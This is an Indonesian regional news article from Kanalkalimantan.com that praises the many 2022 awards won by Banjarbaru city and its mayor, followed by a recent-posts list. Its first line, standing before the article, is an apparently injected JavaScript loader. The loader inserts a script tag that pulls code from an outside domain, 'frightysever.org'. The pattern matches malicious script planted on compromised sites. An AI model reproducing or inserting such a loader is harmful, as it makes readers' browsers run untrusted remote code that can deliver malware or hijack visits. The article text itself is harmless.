(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
KALEIDOSKOP BANJARBARU

Banjarbaru Juara 2022, Tutup Akhir Tahun dengan Berbagai Penghargaan!


KANALKALIMANTAN.COM, BANJARBARU– Predikat sebagai kota paling dinamis layak disematkan kepada Kota Banjarbaru dibawah kepemimpinan Wali Kota Aditya Mufti Ariffin bersama Wakil Wali Kota Wartono. Berbagai capaian hingga penghargaan diraih ibukota Kalimantan Selatan (Kalsel) ini sepanjang tahuan 2022.

Hingga jelang tutup akhir tahun menuju 2023, sejumlah penghargaan masih dikoleksi Banjarbaru di berbagai sektor.

Di bidang Pendidikan, beberapa waktu lalu Kementerian Pendidikan Kebudayaan Riset dan Teknologi melalui Balai Penjamin Mutu Pendidikan (BPMP) Provinsi Kalimantan Selatan menganugerahi perhagaan kepada Kota Banjarbaru. Penhargaan diberikan pada acara bertajuk “BPMP Kalsel Award 2022’ di Hotel Aria Barito Banjarmasin, Jumat (9/12/2022) malam.

Pada ajang penghargaan ini, Kota Banjarbaru dinyatakan sebagai Kota yang berpartisipasi aktif dalam penyelenggaraan program sekolah penggerak tahun 2022. Program Sekolah Penggerak merupakan program nasional sebagai upaya untuk mewujudkan visi Pendidikan Indonesia. Selain itu, Program Sekolah Penggerak juga berfokus pada pengembangan hasil belajar siswa secara holistik yang mencakup kompetensi (literasi dan numerasi) dan karakter, diawali dengan SDM yang unggul baik itu kepala sekolah maupun guru.

 

Wali Kota Aditya saat menerima penghargaan “The Best One Inspiring Leaders”. Foto: ist

Baca juga : Kawanan Pemalak BBM Spesialis Tugboat di Sungai Barito Dibekuk Polres Barsel

Penghargaan ini sekaligus meneguhkan Banjarbaru sebagai kota Pendidikan, bukanlah slogan kosong. Berbagai penghargaan di sektor pendidikan telah banyak direngkuh, seperti pada November tadi dimana kemendikbudristek RI memberikan Kota Banjarbaru gelar Ki Hajar 2022 “Kota Jawara Belajar.Id”.

Di bidang pelayanan, Kementerian Pendayagunaan Aparatur Negara dan Reformasi Birokrasi (PANRB) RI memberikan penghargaan terhadap dua instansi pelayanan publik milik Pemerintah Kota (Pemko) Banjarbaru. Kedua instansi ini meraih predikat kategori pelayanan prima atau predikat A.

Ialah Dinas PMPTSP dan Dinas Kependudukan dan Catatan Sipil Kota Banjarbaru yang sukses meraih predikit tertinggi hasil penilaian unit penyelenggara sektor pelayanan publik di seluruh kabupaten kota di Indonesia. Penghargaan ini diumumkan dan ditandatangani secara langsung Menteri PANRB, H Abdullah Azwar Anas, Jakarta, Selasa (6/12/2022) lalu.

Menteri PANRB mengingatkan terkait pesan Presiden Joko Widodo dimana birokrasi yang dilakukan oleh instansi pemerintah jangan ‘mbulet’ dan harus berdampak, serta bukan lagi hanya sekadar tumpukan kertas. Birokrasi juga harus bergerak lebih lincah dan lebih cepat.

 

Baca juga  : Banjarbaru Juara 2022, Menuju Kota Modern dengan JPO dan Stadion Standar FIFA

Di bidang pemerintahan, Kementerian Keuangan RI memberikan penghargaan Opini WTP (Wajar Tanpa Pengecualian) atas keberhasilan menyusun dan menyajikan laporan keuangan tahun 2021.

Penghargaan itu dilakukan saat berlangsungnya penyerahan Daftar Isian Pelaksanaan Anggaran (DIPA) Buku Daftar Alokasi Transfer Ke Daerah dan Dana Desa Tahun Anggaran 2023 di Gedung Idham Chalid, Komplek Perkantoran Pemprov Kalsel, Rabu (7/12/2022).

Penghargaan Opini WTP dari Menteri Keuangan Sri Mulyani itu diserahkan secara langsung oleh Gubernur Kalsel, Sahbirin Noor kepada Wali Kota Banjarbaru, Aditya Mufti Arifin yang diwakili Sekretaris Daerah Kota Banjarbaru H Said Abdullah.

Sebelumnya juga, penghargaan di bidang lingkungan diberikan oleh Universitas Indonesia (UI). Bersaing secara nasional bersama 34 Kabupaten/Kota lainnya yang mengikuti ajang penilaian UI Green City Metric 2022, Kamis (21/7/2022). Kota Banjarbaru nyatanya berhasil menempati peringkat 8 teratas kategori Kota Paling Berkelanjutan di Indonesia.

Penghargaan dari UI ini bertujuan untuk menjawab berbagai permasalahan keberlanjutan yang dihadapi dunia terlebih di Indonesia saat ini. Kabupaten/Kota diharapkan dapat berkerja bersama-sama untuk mengurangi akibat dari permasalahan lingkungan.

Baca juga  : Tega, Pemuda 22 Tahun Tusuk Teman Ngopi hingga Tak Bernyawa di Guntung Payung

Wali Kota Banjarbaru, Aditya Mufti Ariffin, mengungkapkan bahwa penghargaan ini menjadi bukti nyata bahwa pihaknya terus berupaya dalam meningkatkan kualitas lingkungan di wilayah Banjarbaru.

“Kita ingin mengatasi segala persoalan di bidang lingkungan di kota ini. Upaya itu terus dilakukan berkelanjutan setiap tahunnya. Dan Alhamdulillah, hal itu bisa diliat secara nyata melalui pemberian penghargaan dari Universitas Indonesia,” katanya.

Masih ada juga penghargaan Enam Peserta Terbaik Kategori Instansi Pemerintah Outstanding Achievement pada Kompetisi Pengelolaan Pengaduan Pelayanan Publik ke-4 oleh Kementerian Pemberdayaan Aparatur Negara dan Reformasi Birokrasi (Kemenpan-RB).

Penghargaan di level nasional tersebut diserahkan secara langsung Deputi Bidang Pelayanan Publik Kementerian PANRB, Diah Natalisa dan diterima oleh Wali Kota Banjarbaru, Aditya Mufti Ariffin, yang dalam hal ini diwakili oleh Asisten Administrasi Umum Agus Widjaja, Jakarta, Kamis (16/6/2022).

Pun penghargaan Badan Kepegawaian Negara (BKN) memberikan penghargaan terhadap Pemerintah Kota (Pemko) Banjarbaru dalam ajang BKN Award 2022. Tidak tanggung-tanggung, dua kategori penghargaan level nasional di bidang manajemen ASN ini berhasil diraih.

Baca juga : Ini Pesan Pj Bupati HSU di Pengujung Tahun 2022

Acara penganugerahan yang digelar bersamaan dalam forum evaluasi pengelolaan manajemen kepegawaian se-Indonesia melalui Rapat Koordinasi Nasional (Rakornas), Kamis (21/7/2022), BKN mengumumkan bahwa Pemko Banjarbaru berhasil meraih penghargaan kategori Implementasi Penerapan Manajemen Kinerja dan kategori Implementasi Manajamen ASN Terbaik.

Sementara di level Kalsel, Pemprov menetapkan Banjarbaru sebagai kota terbaik dan teladan dalam hal pembangunan, baik itu infrastruktur maupun SDM. Selain itu, Banjarbaru juga meraih penghargaan terbaik ke 3 atas penilaian kinerja Kabupaten Kota dalam pelaksanaan KP2S (Konvergensi Percepatan Penurunan Stunting) untuk daerah Non Lukus Nasional.

Atas capaian berbagai prestasi itu, tak heran jika Wali Kota Banjarbaru, Aditya Mufti Ariffin, mendapat penghargaan dalam ajang Indonesian The Best One Awards 2022 dengan katogori “The Best One Inspiring Leaders”.

Indonesian The Best One Awards 2022 sendiri diinisiasi oleh majalah nasional The One Mag sebagai bentuk apresiasi kepada para pemimpin di Indonesia dalam melakukan inovasi perubahan untuk kemajuan pemerintahan di daerahnya. Penyelenggaran event ini dipusatkan di Bali, Jumat (25/3/2022).

“Kita harus terus berbenah dan berinovasi. Seluruh sektor, baik infrastruktur, UMKM, pariwisata, ekonomi, semua harus berkembang. Manfaatkan seluruh potensi yang ada. Dengan begitu pula saya yakin masyarakat Banjarbaru akan sejahtera,” tuntas Wali Kota Aditya. (Kanalkalimantan.com/tim)

Reporter : tim
Editor : cell


Desy Arfianty

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

1 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

1 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

2 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

6 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

8 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

8 jam ago

This website uses cookies.